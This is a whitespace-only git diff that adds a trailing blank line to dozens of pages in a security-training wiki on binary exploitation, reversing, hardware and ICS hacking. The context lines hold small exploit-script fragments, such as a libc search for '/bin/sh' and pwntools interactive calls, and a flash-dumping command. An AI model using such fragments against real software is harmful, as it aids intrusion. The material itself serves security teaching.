@@ -25,3 +25,4 @@ More info about One Gadget in:
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
index 69fd4c957..8ad519d74 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aw2exec-got-plt.md
@@ -64,3 +64,4 @@ The **Full RELRO** protection is meant to protect agains this kind of technique
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
index 13a6a376a..32d9e186f 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/arbitrary-write-2-exec/aws2exec-.dtors-and-.fini_array.md
@@ -45,3 +45,4 @@ Note that this **won't** **create** an **eternal loop** because when you get bac
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
index b94a44b17..92d0f8448 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/README.md
@@ -35,3 +35,4 @@ This command loads the executable and the core file into GDB, allowing you to in
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
index cd5ed7b90..742ba8800 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/README.md
@@ -175,3 +175,4 @@ Try to bypass ASLR abusing addresses inside the stack:
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
index b144fa96a..183b59933 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md
@@ -82,3 +82,4 @@ p.interactive()
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
index 20c9dfefd..850bafe24 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
@@ -16,3 +16,4 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
index 6d0524f08..e2ae64f4e 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
@@ -32,3 +32,4 @@ bypassing-canary-and-pie.md
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
index d3e1dfea0..5e3d0e761 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md
@@ -90,3 +90,4 @@ elf.address = RIP - (RIP & 0xfff)
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
index f7986e355..0b2966919 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md
@@ -33,3 +33,4 @@ Note that LIBC's GOT is usually Partial RELRO, so it can be modified with an arb
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
index 54d5a83dd..ab91f509c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md
@@ -70,3 +70,4 @@ If the binary has Partial RELRO, then you can use an arbitrary write to modify t
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
index 9cbef43fa..e7d6e5ed8 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md
@@ -236,3 +236,4 @@ io.interactive()
   - 64 bits, no PIE, nx, modify thread and master canary.
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
index bc6d59959..790338f89 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md
@@ -28,3 +28,4 @@ With an arbitrary read like the one provided by format **strings** it might be p
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
index a2f51f81a..9606d20ef 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md
@@ -38,3 +38,4 @@ In order to bypass this the **escape character `\x16` must be prepended to any `
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
index 35fdff3c3..101c12795 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md
@@ -396,3 +396,4 @@ The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thr
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
index 4a7a297bf..024999845 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md
@@ -170,3 +170,4 @@ p.interactive()
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
index 5260f58fb..ddd9f2b58 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
@@ -142,3 +142,4 @@ P.interactive()
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
index ed33d2c84..22fdf02e7 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
@@ -22,3 +22,4 @@ To the address indicated by One Gadget you need to **add the base address where
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
index 1c69a5277..b32c98ca6 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
@@ -95,3 +95,4 @@ There are several protections trying to prevent the exploitation of vulnerabilit
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
index 070328c13..395956bd9 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
@@ -29,3 +29,4 @@ You can find an example in:
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
index 2e68173a8..b7cffb228 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
@@ -82,3 +82,4 @@ Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protec
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
index 803a9e427..25ca65ab0 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
@@ -65,3 +65,4 @@ p.interactive()
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
index c76e07751..920fe6d48 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
@@ -66,3 +66,4 @@ You can find an example here: [https://ir0nstone.gitbook.io/notes/types/stack/re
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
index 61f7f38fd..f25d3f66c 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
@@ -143,3 +143,4 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format
 {{#include ../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
index a6ed561de..31bdd49c6 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
@@ -305,3 +305,4 @@ BINSH = next(libc.search("/bin/sh")) - 64
 {{#include ../../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
index 9e880995a..caf6a76ea 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@@ -219,3 +219,4 @@ BINSH = next(libc.search("/bin/sh")) - 64
 {{#include ../../../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
index dbc6084a9..aa8560981 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
@@ -33,3 +33,4 @@ Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overf
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
index c2539d09c..dd2e8067f 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
@@ -99,3 +99,4 @@ The Python script sends a carefully crafted message that, when processed by the
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
index bf1ab4fd9..495b9aaf9 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
@@ -180,3 +180,4 @@ stack-pivoting-ebp2ret-ebp-chaining.md
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
index a19003e59..0283dadac 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
@@ -199,3 +199,4 @@ target.interactive()
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
index aef7facea..9de40c526 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
@@ -62,3 +62,4 @@ p.interactive()
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
index a81314ee5..3c39e27b3 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
@@ -190,3 +190,4 @@ xchg <reg>, rsp
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
index 37bd380df..533b36cc0 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
@@ -95,3 +95,4 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/common-api-used-in-malware.md b/src/reversing/common-api-used-in-malware.md
index 987b6028c..04c816d24 100644
--- a/src/reversing/common-api-used-in-malware.md
+++ b/src/reversing/common-api-used-in-malware.md
@@ -139,3 +139,4 @@ The malware will unmap the legitimate code from memory of the process and load a
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/cryptographic-algorithms/README.md b/src/reversing/cryptographic-algorithms/README.md
index 018650d03..84569181f 100644
--- a/src/reversing/cryptographic-algorithms/README.md
+++ b/src/reversing/cryptographic-algorithms/README.md
@@ -185,3 +185,4 @@ Check **3 comparisons to recognise it**:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/cryptographic-algorithms/unpacking-binaries.md b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
index fa9e007e4..9132f1946 100644
--- a/src/reversing/cryptographic-algorithms/unpacking-binaries.md
+++ b/src/reversing/cryptographic-algorithms/unpacking-binaries.md
@@ -24,3 +24,4 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools-basic-methods/README.md b/src/reversing/reversing-tools-basic-methods/README.md
index 2ca719738..fb7c07bb3 100644
--- a/src/reversing/reversing-tools-basic-methods/README.md
+++ b/src/reversing/reversing-tools-basic-methods/README.md
@@ -412,3 +412,4 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools-basic-methods/angr/README.md b/src/reversing/reversing-tools-basic-methods/angr/README.md
index 5cff6ad5a..2bb827489 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/README.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/README.md
@@ -211,3 +211,4 @@ Furthermore, you can use `proj.hook_symbol(name, hook)`, providing the name of a
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
index 6dde52c67..b8e79f15d 100644
--- a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
+++ b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md
@@ -836,3 +836,4 @@ if __name__ == '__main__':
 {{#include ../../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools-basic-methods/blobrunner.md b/src/reversing/reversing-tools-basic-methods/blobrunner.md
index 528d3a514..a6cd68d9f 100644
--- a/src/reversing/reversing-tools-basic-methods/blobrunner.md
+++ b/src/reversing/reversing-tools-basic-methods/blobrunner.md
@@ -210,3 +210,4 @@ int main(int argc, char* argv[])
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools-basic-methods/cheat-engine.md b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
index 1d8eb48f5..2e0b2442e 100644
--- a/src/reversing/reversing-tools-basic-methods/cheat-engine.md
+++ b/src/reversing/reversing-tools-basic-methods/cheat-engine.md
@@ -163,3 +163,4 @@ So, insert your new assembly code in the "**newmem**" section and remove the ori
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
index 052f3ae17..9a1901a41 100644
--- a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
+++ b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md
@@ -188,3 +188,4 @@ else:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools/README.md b/src/reversing/reversing-tools/README.md
index 49c5e8462..ca9f57426 100644
--- a/src/reversing/reversing-tools/README.md
+++ b/src/reversing/reversing-tools/README.md
@@ -114,3 +114,4 @@ To decompile Java bytecode, these tools can be very helpful:
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/reversing-tools/blobrunner.md b/src/reversing/reversing-tools/blobrunner.md
index 528d3a514..a6cd68d9f 100644
--- a/src/reversing/reversing-tools/blobrunner.md
+++ b/src/reversing/reversing-tools/blobrunner.md
@@ -210,3 +210,4 @@ int main(int argc, char* argv[])
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/reversing/word-macros.md b/src/reversing/word-macros.md
index f3d025225..f5234fae6 100644
--- a/src/reversing/word-macros.md
+++ b/src/reversing/word-macros.md
@@ -18,3 +18,4 @@ Using the **GetObject** function it's possible to obtain data from forms of the
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/stego/esoteric-languages.md b/src/stego/esoteric-languages.md
index 7661d896c..9890075ce 100644
--- a/src/stego/esoteric-languages.md
+++ b/src/stego/esoteric-languages.md
@@ -69,3 +69,4 @@ Kukarek
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/stego/stego-tricks.md b/src/stego/stego-tricks.md
index d62dec11c..0f465574c 100644
--- a/src/stego/stego-tricks.md
+++ b/src/stego/stego-tricks.md
@@ -220,3 +220,4 @@ For translating Braille, the [Branah Braille Translator](https://www.branah.com/
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/6881-udp-pentesting-bittorrent.md b/src/todo/6881-udp-pentesting-bittorrent.md
index 25c97cae9..1fffcb957 100644
--- a/src/todo/6881-udp-pentesting-bittorrent.md
+++ b/src/todo/6881-udp-pentesting-bittorrent.md
@@ -3,3 +3,4 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/android-forensics.md b/src/todo/android-forensics.md
index 079176ee7..ed1b539ce 100644
--- a/src/todo/android-forensics.md
+++ b/src/todo/android-forensics.md
@@ -27,3 +27,4 @@ Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md
index 14466ea26..927d53fa0 100644
--- a/src/todo/burp-suite.md
+++ b/src/todo/burp-suite.md
@@ -17,3 +17,4 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/cookies-policy.md b/src/todo/cookies-policy.md
index 08300b186..427802224 100644
--- a/src/todo/cookies-policy.md
+++ b/src/todo/cookies-policy.md
@@ -46,3 +46,4 @@ If you have any questions or concerns about this Cookies Policy, please contact
 
 
 
+
diff --git a/src/todo/hardware-hacking/README.md b/src/todo/hardware-hacking/README.md
index 7ce959e33..e464ff0b7 100644
--- a/src/todo/hardware-hacking/README.md
+++ b/src/todo/hardware-hacking/README.md
@@ -52,3 +52,4 @@ The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/hardware-hacking/fault_injection_attacks.md b/src/todo/hardware-hacking/fault_injection_attacks.md
index 6b96e7df6..8c9946b40 100644
--- a/src/todo/hardware-hacking/fault_injection_attacks.md
+++ b/src/todo/hardware-hacking/fault_injection_attacks.md
@@ -6,3 +6,4 @@ There are a lot of methods and mediums for injecting fault into an electronic ci
 
 
 
+
diff --git a/src/todo/hardware-hacking/i2c.md b/src/todo/hardware-hacking/i2c.md
index 5544a7e5a..5d49e5041 100644
--- a/src/todo/hardware-hacking/i2c.md
+++ b/src/todo/hardware-hacking/i2c.md
@@ -212,3 +212,4 @@ Any key to exit
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/hardware-hacking/jtag.md b/src/todo/hardware-hacking/jtag.md
index ccbfd02f5..1e28c9127 100644
--- a/src/todo/hardware-hacking/jtag.md
+++ b/src/todo/hardware-hacking/jtag.md
@@ -26,3 +26,4 @@ If you are contacting a JTAG, you will find one or several **lines starting by F
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/hardware-hacking/radio.md b/src/todo/hardware-hacking/radio.md
index 79ce5586d..2e7666bc7 100644
--- a/src/todo/hardware-hacking/radio.md
+++ b/src/todo/hardware-hacking/radio.md
@@ -198,3 +198,4 @@ You can use the **same technique as the one used in the AM example** to get the
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/hardware-hacking/side_channel_analysis.md b/src/todo/hardware-hacking/side_channel_analysis.md
index af4df1da0..f0a169bc2 100644
--- a/src/todo/hardware-hacking/side_channel_analysis.md
+++ b/src/todo/hardware-hacking/side_channel_analysis.md
@@ -8,3 +8,4 @@ These attacks are very popular in case of leaking data such as private keys or f
 
 
 
+
diff --git a/src/todo/hardware-hacking/spi.md b/src/todo/hardware-hacking/spi.md
index f60d72f06..55b394f92 100644
--- a/src/todo/hardware-hacking/spi.md
+++ b/src/todo/hardware-hacking/spi.md
@@ -67,3 +67,4 @@ flashrom -VV -c "W25Q64.V" -p buspirate_spi:dev=COM3 -r flash_content.img
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/hardware-hacking/uart.md b/src/todo/hardware-hacking/uart.md
index f99b8a08d..b2e270fa2 100644
--- a/src/todo/hardware-hacking/uart.md
+++ b/src/todo/hardware-hacking/uart.md
@@ -185,3 +185,4 @@ Although, it is necessary to note that it's not always the case that the uboot i
 {{#include ../../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/industrial-control-systems-hacking/README.md b/src/todo/industrial-control-systems-hacking/README.md
index 37829c900..59b927e35 100644
--- a/src/todo/industrial-control-systems-hacking/README.md
+++ b/src/todo/industrial-control-systems-hacking/README.md
@@ -17,3 +17,4 @@ These techniques can also be used to protect against attacks and blue teaming fo
 
 
 
+
diff --git a/src/todo/industrial-control-systems-hacking/modbus.md b/src/todo/industrial-control-systems-hacking/modbus.md
index 5b423d8b3..1ddffe887 100644
--- a/src/todo/industrial-control-systems-hacking/modbus.md
+++ b/src/todo/industrial-control-systems-hacking/modbus.md
@@ -34,3 +34,4 @@ Due to it's large scale use and lack of upgradations, attacking Modbus provides
 
 
 
+
diff --git a/src/todo/interesting-http.md b/src/todo/interesting-http.md
index 5efcf75c2..14a3a2afa 100644
--- a/src/todo/interesting-http.md
+++ b/src/todo/interesting-http.md
@@ -39,3 +39,4 @@ Never put any sensitive data inside GET parameters or paths in the URL.
 {{#include ../banners/hacktricks-training.md}}
 
 
+
diff --git a/src/todo/investment-terms.md b/src/todo/investment-terms.md
index c0c66c4c0..663a09170 100644
--- a/src/todo/investment-terms.md
+++ b/src/todo/investment-terms.md
@@ -69,3 +69,4 @@ However, the buyer will be paying some fee to the seller for opening the option
 
 
 
+
diff --git a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
index e56929d3c..68bd15747 100644
--- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
